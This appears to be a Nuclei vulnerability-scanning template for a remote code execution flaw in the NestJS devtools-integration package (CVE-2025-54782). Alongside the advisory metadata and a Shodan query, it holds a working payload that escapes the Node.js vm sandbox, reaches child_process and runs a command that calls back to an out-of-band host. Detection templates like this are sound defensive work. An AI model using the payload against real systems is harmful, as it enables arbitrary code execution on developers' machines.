id: CVE-2025-54782

info:
  name: NestJS DevTools Integration - Remote Code Execution
  author: nukunga
  severity: critical
  description: |
    Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox.
  impact: |
    Malicious websites visited by developers can execute arbitrary code on their local machine through the unprotected /inspector/graph/interact endpoint due to improper sandboxing.
  remediation: This is fixed in version 0.2.1.
  reference:
    - https://socket.dev/blog/nestjs-rce-vuln
    - https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54782
  classification:
    cvss-metrics: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 9.4
    cve-id: CVE-2025-54782
    epss-score: 0.35077
    epss-percentile: 0.9715
    cwe-id: CWE-77,CWE-352,CWE-78
  metadata:
    verified: true
    max-request: 1
    shodan-query: "devtools.nestjs.com"
  tags: cve,cve2025,nestjs,rce,sandbox,devtool,unauth,vkev,vuln

http:
  - raw:
      - |
        POST /inspector/graph/interact HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain

        {"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: content_type
        words:
          - "application/plain"

      - type: status
        status:
          - 200
# digest: 490a0046304402203dfd3568eaa39a94b3b1fe627b3d84a8d588fff28ef1192c80466df05d7678bd02200e877d2d70d40e09ae79a9a64c55e16351694f807faa6b47960f980e734b65d4:922c64590222798bb761d5b6d8e72950